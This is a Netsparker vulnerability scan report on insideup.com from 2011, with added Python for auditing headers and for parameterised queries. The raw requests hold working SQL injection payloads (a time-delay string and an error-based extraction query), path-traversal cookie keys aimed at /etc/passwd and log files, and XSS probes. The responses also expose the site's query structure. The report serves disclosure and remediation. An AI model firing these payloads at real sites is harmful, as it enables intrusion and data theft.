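The three header findings above (Cookie Not Marked As HttpOnly, Apache Version Disclosure and PHP Version Disclosure) are all passive checks on a single HTTP response, so they are easiest to verify, and to re-verify after a fix, with one small audit routine. The following Python is an added example, not part of the Netsparker report or the insideup.com site. The sample responses are constructed: they are trimmed versions of the responses quoted in this report (the index.html 200, the / redirect and the /openx/www/ redirect, with the PHPSESSID cookie from the project.php response folded into the last one), plus a fourth sample showing what the index response should look like once the remedies are applied. Finding names follow the report's own wording.

```python
import re

# Product/version pairs such as "Apache/2.2.9" or "PHP/5.2.6"
VERSION_RE = re.compile(r"(?P<product>[A-Za-z-]+)/(?P<version>\d[\w.]*)")
# The <address> footer Apache adds to its own error pages when ServerSignature is On
ADDRESS_RE = re.compile(r"<address>(?P<text>[^<]*)</address>", re.IGNORECASE)


def parse_response(raw):
    """Split a raw HTTP/1.x response into (status line, [(name, value)], body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    status_line, *header_lines = head.split("\n")
    headers = []
    for line in header_lines:
        name, _, value = line.partition(":")
        headers.append((name.strip().lower(), value.strip()))
    return status_line, headers, body


def audit_cookies(headers, https=False):
    """Flag Set-Cookie headers lacking HttpOnly (and Secure, when served over TLS)."""
    findings = []
    for name, value in headers:
        if name != "set-cookie":
            continue
        cookie_name = value.split("=", 1)[0].strip()
        # attribute names after the first "name=value" pair, case-insensitive
        attrs = {part.strip().split("=", 1)[0].lower() for part in value.split(";")[1:]}
        if "httponly" not in attrs:
            findings.append(("Cookie Not Marked As HttpOnly", cookie_name))
        if https and "secure" not in attrs:
            findings.append(("Cookie Not Marked As Secure", cookie_name))
    return findings


def audit_versions(headers, body):
    """Flag version strings in Server / X-Powered-By and in Apache error-page footers."""
    findings = []
    for name, value in headers:
        if name in ("server", "x-powered-by"):
            m = VERSION_RE.match(value)
            if m:
                findings.append((f"{m.group('product')} Version Disclosure", f"{name}: {value}"))
    m = ADDRESS_RE.search(body)
    if m and VERSION_RE.search(m.group("text")):
        findings.append(("Apache Version Disclosure", "error page footer: " + m.group("text").strip()))
    return findings


def audit(raw, https=False):
    """All findings for one raw response; https=True enables the Secure-flag check."""
    _, headers, body = parse_response(raw)
    return audit_cookies(headers, https) + audit_versions(headers, body)


# Constructed samples, trimmed from the responses quoted in this report.
SAMPLE_INDEX = """\
HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:15:14 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5; Path=/
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html><html><head><title>index</title></head><body></body></html>
"""

SAMPLE_REDIRECT = """\
HTTP/1.1 302 Found
Server: Apache/2.2.9 (Fedora)
Location: http://www.insideup.com/index.html
Content-Type: text/html; charset=iso-8859-1

<html><body><h1>Found</h1><hr><address>Apache/2.2.9 (Fedora) Server at www.insideup.com Port 80</address></body></html>
"""

SAMPLE_OPENX = """\
HTTP/1.1 302 Found
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Set-Cookie: PHPSESSID=vaor1st9gh2tr7opjdlm5ughv2; path=/
Location: http://www.insideup.com/openx/www/admin/index.php
Content-Type: text/html; charset=UTF-8

"""

# Constructed: the index response after ServerTokens Prod and HttpOnly/Secure cookies
SAMPLE_HARDENED = """\
HTTP/1.1 200 OK
Server: Apache
Set-Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5; Path=/; HttpOnly; Secure
Content-Type: text/html;charset=ISO-8859-1

<!DOCTYPE html><html><head><title>index</title></head><body></body></html>
"""

if __name__ == "__main__":
    for label, sample in [("index", SAMPLE_INDEX), ("redirect", SAMPLE_REDIRECT),
                          ("openx", SAMPLE_OPENX), ("hardened", SAMPLE_HARDENED)]:
        for kind, detail in audit(sample, https=True):
            print(f"{label}: {kind} ({detail})")
```

The hardened sample is what the settings below produce. For Apache, `ServerTokens Prod` reduces the header to `Server: Apache` and `ServerSignature Off` removes the `<address>` footer from the 302 and 403 pages quoted in this report. For PHP, `expose_php = Off` in php.ini drops the X-Powered-By header and `session.cookie_httponly = 1` marks PHPSESSID as HttpOnly. For the JSESSIONID cookie, a Servlet 3.0 web.xml can declare `<session-config><cookie-config><http-only>true</http-only><secure>true</secure></cookie-config></session-config>`; if the container is Tomcat (an assumption, the report only shows the cookie name), `useHttpOnly="true"` on the `<Context>` element does the same for Tomcat 6.0.19 and later. The Secure flag only matters once the site is served over TLS, which is why the scan over plain HTTP on port 80 would not have reported it; the `https` parameter models that distinction.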
- /openx/www/

/openx/www/

http://www.insideup.com/openx/www/

Extracted Version

PHP/5.2.6

Request

GET /openx/www/ HTTP/1.1
Referer: http://www.insideup.com/openx/www/delivery/ck.php?n=a08b960a&cb=INSERT_RANDOM_NUMBER_HERE
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 302 Found
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Location: http://www.insideup.com/openx/www/admin/index.php
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8


Database Error Message

1 TOTAL
LOW
Netsparker identified a database error message. In this case the response body echoes the complete SQL statement, including the injected catId value, followed by the MySQL syntax error.

Impact

The error message may disclose sensitive information that an attacker can use to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue to an SQL Injection vulnerability; most of the time Netsparker detects and reports that problem separately. Here the echoed statement shows the catId parameter being concatenated directly into the query text, so the value is reaching the database unescaped.

Remedy

Do not show raw error messages in production environments. Log each error with a reference number to backend storage such as a text file or database, then show only that number and a static, user-friendly error message to the user.
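Two things are worth separating in the response quoted below. The `';WAITFOR DELAY '0:0:25'--` payload is Microsoft SQL Server syntax, and the error text shows the back end is MySQL, so the delay itself could never have fired; what the finding actually proves is that the request path and query string are pasted into the statement as text. The root fix is therefore a bound parameter, and the remedy above (log the detail, show a reference) is the second layer that stops the statement from ever being echoed. The following Python is an added example, not code from the report or from the site: it uses an in-memory sqlite3 table as a stand-in for the `lead_flow_one_pages_details` table named in the echoed query (columns simplified, data constructed), reproduces the string-built `WHERE ... OR ...` shape, and contrasts it with a parameterised lookup and a request handler that implements the reference-number remedy. sqlite rejects the payload with a driver error instead of MySQL's parser error (an assumption about the stand-in, not the site), but the observable effect, an exception carrying SQL detail, is the same. `leaks_db_error` is a scanner-style check for the markers a practitioner would grep for in responses.

```python
import logging
import sqlite3
import uuid

# The catId value from the report's request, plus a normal one for comparison
PAYLOAD = "';WAITFOR DELAY '0:0:25'--"
NORMAL_CAT_ID = "20001"

# Substrings that indicate a raw database error reached the HTTP response.
# The first is the MySQL message echoed in this report; the rest are constructed.
DB_ERROR_MARKERS = (
    "You have an error in your SQL syntax",
    "Warning: mysql_",
    "sqlite3.OperationalError",
    "ORA-",
)


def make_db():
    """Constructed in-memory stand-in for lead_flow_one_pages_details."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "create table lead_flow_one_pages_details "
        "(catId integer, groupId integer, templateId integer, project_page_url text)"
    )
    conn.execute(
        "insert into lead_flow_one_pages_details values (?, ?, ?, ?)",
        (20001, 1, 1, "leadflow/wede00/project.php?catId=20001&iusrc=iupsc"),
    )
    conn.commit()
    return conn


def page_url(cat_id, iusrc="iupsc"):
    """The report shows the request path and query string being embedded as-is."""
    return f"leadflow/wede00/project.php?catId={cat_id}&iusrc={iusrc}"


def lookup_vulnerable(conn, cat_id):
    """String-built query: the catId value becomes part of the SQL text (the bug)."""
    url = page_url(cat_id)
    sql = (
        "select catId, groupId, templateId, project_page_url "
        "from lead_flow_one_pages_details "
        f"where project_page_url = '{url}' OR project_page_url = '{url}/'"
    )
    return conn.execute(sql).fetchall()


def lookup_parameterised(conn, cat_id):
    """Bound parameters: the same value is data, never SQL (the fix)."""
    url = page_url(cat_id)
    sql = (
        "select catId, groupId, templateId, project_page_url "
        "from lead_flow_one_pages_details "
        "where project_page_url = ? OR project_page_url = ?"
    )
    return conn.execute(sql, (url, url + "/")).fetchall()


def handle_request(conn, cat_id, lookup=lookup_parameterised):
    """Remedy for the error message: log details under a reference id, return a static page."""
    try:
        rows = lookup(conn, cat_id)
    except (sqlite3.Error, sqlite3.Warning) as exc:  # older Pythons raise Warning for multi-statement input
        ref = uuid.uuid4().hex[:12]
        # the full exception (which contains SQL) goes to the log only, never to the client
        logging.getLogger("leadflow").error("ref=%s catId=%r db_error=%s", ref, cat_id, exc)
        return {"status": 500, "body": f"Something went wrong. Reference: {ref}"}
    return {"status": 200, "body": rows}


def leaks_db_error(body):
    """Scanner-style check: does a response body contain a raw database error?"""
    return any(marker in body for marker in DB_ERROR_MARKERS)


if __name__ == "__main__":
    db = make_db()
    print("parameterised, normal id:", handle_request(db, NORMAL_CAT_ID))
    print("parameterised, payload:  ", handle_request(db, PAYLOAD))
    print("string-built, payload:   ", handle_request(db, PAYLOAD, lookup_vulnerable))
```

Note that the parameterised lookup simply returns no rows for the payload, so the generic-error path is only reached through the string-built query; keeping both layers means a future query that someone builds by hand again still cannot echo its SQL to the client.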
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&i..

Parameters

Parameter Type Value
catId GET ';WAITFOR DELAY '0:0:25'--
iusrc GET iupsc

Request

GET /ppc/leadflow/wede00/project.php?catId=%27;WAITFOR%20DELAY%20%270:0:25%27--&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[../../../../../../../../../../proc/self/fd/2\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 
OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:22:24 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=vaor1st9gh2tr7opjdlm5ughv2; path=/
Content-Length: 2923
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY 
'0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId=';WAITFOR DELAY '0:0:25'--&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede0' at line 5
Forbidden Resource

1 TOTAL
INFORMATION
CONFIRMED
1
Access to this resource has been denied by the web server. This is generally not a security issue, and is reported here for information purposes.

Impact

There is no impact resulting from this issue.
- /js/

/js/ CONFIRMED

http://www.insideup.com/js/

Request

GET /js/ HTTP/1.1
Referer: http://www.insideup.com/js/jquery-1.2.1.js
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: JSESSIONID=F53C9933FE14A39B648D7D0BA68B6BA5
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 403 Forbidden
Date: Wed, 20 Apr 2011 02:15:15 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 286
Connection: close
Content-Type: text/html; charset=iso-8859-1


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access /js/on this server.</p><hr><address>Apache/2.2.9 (Fedora) Server at www.insideup.com Port 80</address></body></html>
MySQL Database Identified

1 TOTAL
INFORMATION
CONFIRMED
1
Netsparker identified that the target web site is using a MySQL Server. This is generally not a security issue and is reported here for information purposes.

Impact

This issue is reported as additional information only; there is no direct impact arising from it.
- /ppc/leadflow/wede00/project.php

/ppc/leadflow/wede00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select..

Request

GET /ppc/leadflow/wede00/project.php?catId='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:23:03 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=3jpuhm6d0i03rre8doid216i86; path=/
Content-Length: 4868
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from 
lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on 
cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/wede00/project.php?catId='+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&iusrc=iupsc/'Duplicate entry '_!@4dilemma:1' for key 1
Directory Listing (Apache)

1 TOTAL
INFORMATION
The web server responded with a list of files located in the target directory.

Impact

An attacker can see the files located in the directory and could potentially access files which disclose sensitive information.

Actions to Take

  1. See the remedy for the solution.
  2. Configure the web server to disallow directory listing requests.
  3. This can also be caused by web server products that do not have the latest security patches. Ensure that all patches have been applied.

Remedy

Change your httpd.conf file. A secure configuration for the requested directory should be similar to the following one:
<Directory /{YOUR DIRECTORY}>
	Options FollowSymLinks 
</Directory>
Remove the Indexes option from the configuration. Do not forget to remove MultiViews as well.

External References

- /css/

/css/

https://www.insideup.com/css/

Request

GET /css/ HTTP/1.1
Referer: https://www.insideup.com/css/mainNewInsideup.css
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:49:41 GMT
Server: Apache/2.2.9 (Fedora)
Content-Length: 3788
Connection: close
Content-Type: text/html;charset=ISO-8859-1


